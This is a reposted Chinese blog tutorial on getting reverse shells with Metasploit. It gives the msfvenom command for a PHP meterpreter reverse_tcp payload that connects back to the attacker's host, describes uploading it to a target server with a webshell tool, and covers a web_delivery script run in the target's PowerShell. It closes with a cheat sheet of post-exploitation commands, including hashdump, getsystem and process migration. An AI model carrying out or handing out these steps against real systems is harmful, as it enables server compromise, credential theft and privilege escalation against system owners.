今天回顧了一下msf反彈shell的操作,在這裡做一下記錄和分享。( ̄︶ ̄)↗
反彈shell的兩種方法
![](https://img.laitimes.com/img/9ZDMuAjOiMmIsIjOiQnIsIyZuBnL1MTM5QjM4MjNx0CMyUDO1EDM2ETNxUDM5EDMy0SMwYzN4YTMvwVNwkTMwIzLcFDM2cDO2EzLcd2bsJ2Lc12bj5ycn9Gbi52YugTMwIzZtl2Lc9CX6MHc0RHaiojIsJye.png)
第一種Msfvenom執行個體:
1、msfconsole #啟動msf
2、msfvenom -p php/meterpreter/reverse_tcp LHOST=<Your IP Address> LPORT=<Your Port to Connect On> -f raw > shell.php #生成反彈shell檔案
LHOST表示本地攻擊機的ip, LPORT表示本地攻擊機的端口。
其他msf下的各種生成payload指令可參考:https://www.cnblogs.com/backlion/p/6000544.html
![]()
msf反彈shell 這樣我們就成功生成了一個shell.php檔案。
3、接下來我們需要在本機中監聽4444端口。
![]()
msf反彈shell ![]()
msf反彈shell ![]()
msf反彈shell 這就表示開始本機開始監聽4444端口了。
4、現在把shell.php檔案通過菜刀上傳至目标伺服器中,然後本地遊覽器通路shell.php
即可以看見成功傳回了一個session![]()
msf反彈shell sessions -i #檢視目前可用會話![]()
msf反彈shell ![]()
msf反彈shell ![]()
msf反彈shell
第二種web_delivery執行個體流程:
1、msfconsole #啟動msf![]()
msf反彈shell 2、show options #目的是看exploit target為什麼腳本
這裡預設為pyhton,需要更改為php
![]()
msf反彈shell show payloads #挑選payload,選擇php/meterpreter/reverse_tcp![]()
msf反彈shell 然後設定lhost![]()
msf反彈shell ![]()
msf反彈shell 得到一段腳本,将這段腳本在目标機的powershell中執行即可反彈shell。![]()
msf反彈shell
下面貼一些常用的指令:
基礎指令: seach cve-2017-7494 #檢視是否存在指定漏洞 use exploit/multi/handler #使用exploit/multi/handler子產品 info #檢視資訊 show options #檢視exp的參數 rhost 是遠端主機位址 lhost是本地主機位址 back #傳回上一級 session -i #檢視目前可用會話 sessions -i x #切換至會話x session -k #殺死所有活躍會話 background #将會話放到背景 route #檢視被控主機路由表 sysinfo #檢視系統資訊 run post/windows/gather/checkvm #檢查是否在虛拟機上運作 idletime #檢視運作時間 getuid #獲得運作Meterpreter會話的使用者名,進而檢視目前會話具有的權限 getsystem #通過各種攻擊向量來提升到系統使用者權限 getwd pwd #shell處于靶機的目錄 getlwd #本地的目錄位置 hashdump #導出目标主機中的密碼哈希值 screenshot #對目标主機的螢幕進行截圖 backgroud #将目前Meterpreter shell轉為背景執行 quit #關閉目前Meterpreter會話,傳回MSF終端 ps #顯示所有運作程序以及管聯的使用者賬戶 migrate PID #遷移到一個指定的程序PID post/windows/manage/migrate #會自動尋找合适的程序進行遷移 execute -f cmd.exe -i #執行cmd.exe指令并進行互動 shell #以所有可用令牌來運作一個互動的shell
轉載于:https://www.cnblogs.com/HKCZ/p/10870029.html